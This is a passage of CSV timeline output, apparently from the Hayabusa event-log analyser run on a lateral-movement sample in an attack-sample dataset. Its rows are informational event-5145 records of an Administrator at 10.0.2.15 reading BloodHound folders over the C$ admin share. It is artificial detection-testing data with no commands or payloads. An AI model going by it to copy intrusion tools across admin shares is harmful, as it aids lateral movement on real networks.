+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : 
IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 
